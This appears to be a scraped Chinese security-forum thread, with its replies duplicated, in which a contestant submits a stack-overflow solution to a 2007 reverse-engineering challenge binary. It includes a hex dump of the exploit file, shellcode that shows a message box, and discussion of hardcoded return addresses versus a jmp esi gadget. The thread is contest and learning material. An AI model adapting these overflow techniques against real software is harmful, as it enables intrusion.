[原创]第二阶段第一题答案提交-1)珠海金山2007逆向分析挑战赛-看雪-安全社区|安全招聘|kanxue.com

最新回复 (13)
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 2 楼原来是大写的，还有个感叹号 :( 改三个字节就行了。上传的附件： test.txt （0.05kb，8次下载） 2007-8-28 15:22 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 3 楼其实第二次提交和第一次原理一样的： Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 00000000 B5 33 00 00 99 14 00 00 4F 4B 21 00 00 00 00 00 µ3..™...OK!..... 00000016 83 EC 2C 6A 00 8D 44 24 04 50 50 6A 00 E8 F8 09 ƒì,j.D$.PPj.èø. 00000032 32 7E 83 C4 4C 5D C3 00 00 00 00 00 00 00 00 00 2~ƒÄL]Ã......... 00000048 80 FB 12 00 €û.. 偏移 8,9,10 处是 "ok" 字符串，第一次提交写的是小写，第二次改成大写，后面加了个感叹号 (0x21). 2007-8-28 15:28 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 4 楼溢出后返回到堆栈一个地址。这个地址我是硬编码进去的，希望在其它机器上这个值一样。 2007-8-28 15:38 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 5 楼溢出后返回到的地址：12FB80 ShellCode 代码： 0012FB80 83EC 2C SUB ESP,2C 0012FB83 6A 00 PUSH 0 0012FB85 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] 0012FB89 50 PUSH EAX 0012FB8A 50 PUSH EAX 0012FB8B 6A 00 PUSH 0 0012FB8D E8 F809327E CALL USER32.MessageBoxA 0012FB92 83C4 4C ADD ESP,4C 0012FB95 5D POP EBP 0012FB96 C3 RETN 2007-8-28 15:40 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 6 楼单击按钮后，直接崩溃 2007-8-28 15:43 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 7 楼还能再提交吗？最后一次，没其它环境测试。上传的附件： test.txt （0.05kb，4次下载） 2007-8-28 17:25 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 8 楼还是没通过，直接崩溃。你思路有问题，这题可以做到与系统无关的。 2007-8-28 17:31 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 9 楼我知道了。我选择了 kernel32.dll 中的 jmp esi. 应该选择 ExploitMe.exe 里的 jmp esi. 算了，已经满两次了。 2007-8-28 17:33 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 10 楼你可能没细看规则，附件可以允许多次提交的，只是每提交一次，减5分。 2007-8-28 18:27 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 11 楼哦.理解错了.我以为只能两次. 再次提交. 这个应该正常,且可以反复溢出. 上传的附件： test.txt （0.05kb，13次下载） 2007-8-28 19:17 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 12 楼验证通过~~ 2007-8-28 19:57 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 13 楼总算过了. Thanks~~ 受益非浅. 期待后面的题目更精彩 2007-8-28 21:30 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 14 楼 123.1518639034595146348511616371 2007-9-2 21:18 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (13)
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 2 楼原来是大写的，还有个感叹号 :( 改三个字节就行了。上传的附件： test.txt （0.05kb，8次下载） 2007-8-28 15:22 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 3 楼其实第二次提交和第一次原理一样的： Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 00000000 B5 33 00 00 99 14 00 00 4F 4B 21 00 00 00 00 00 µ3..™...OK!..... 00000016 83 EC 2C 6A 00 8D 44 24 04 50 50 6A 00 E8 F8 09 ƒì,j.D$.PPj.èø. 00000032 32 7E 83 C4 4C 5D C3 00 00 00 00 00 00 00 00 00 2~ƒÄL]Ã......... 00000048 80 FB 12 00 €û.. 偏移 8,9,10 处是 "ok" 字符串，第一次提交写的是小写，第二次改成大写，后面加了个感叹号 (0x21). 2007-8-28 15:28 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 4 楼溢出后返回到堆栈一个地址。这个地址我是硬编码进去的，希望在其它机器上这个值一样。 2007-8-28 15:38 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 5 楼溢出后返回到的地址：12FB80 ShellCode 代码： 0012FB80 83EC 2C SUB ESP,2C 0012FB83 6A 00 PUSH 0 0012FB85 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] 0012FB89 50 PUSH EAX 0012FB8A 50 PUSH EAX 0012FB8B 6A 00 PUSH 0 0012FB8D E8 F809327E CALL USER32.MessageBoxA 0012FB92 83C4 4C ADD ESP,4C 0012FB95 5D POP EBP 0012FB96 C3 RETN 2007-8-28 15:40 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 6 楼单击按钮后，直接崩溃 2007-8-28 15:43 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 7 楼还能再提交吗？最后一次，没其它环境测试。上传的附件： test.txt （0.05kb，4次下载） 2007-8-28 17:25 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 8 楼还是没通过，直接崩溃。你思路有问题，这题可以做到与系统无关的。 2007-8-28 17:31 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 9 楼我知道了。我选择了 kernel32.dll 中的 jmp esi. 应该选择 ExploitMe.exe 里的 jmp esi. 算了，已经满两次了。 2007-8-28 17:33 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 10 楼你可能没细看规则，附件可以允许多次提交的，只是每提交一次，减5分。 2007-8-28 18:27 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 11 楼哦.理解错了.我以为只能两次. 再次提交. 这个应该正常,且可以反复溢出. 上传的附件： test.txt （0.05kb，13次下载） 2007-8-28 19:17 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 12 楼验证通过~~ 2007-8-28 19:57 0
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 55 粉丝 1 关注私信	null 1 13 楼总算过了. Thanks~~ 受益非浅. 期待后面的题目更精彩 2007-8-28 21:30 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 14 楼 123.1518639034595146348511616371 2007-9-2 21:18 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]第二阶段第一题 答案提交

[原创]第二阶段第一题答案提交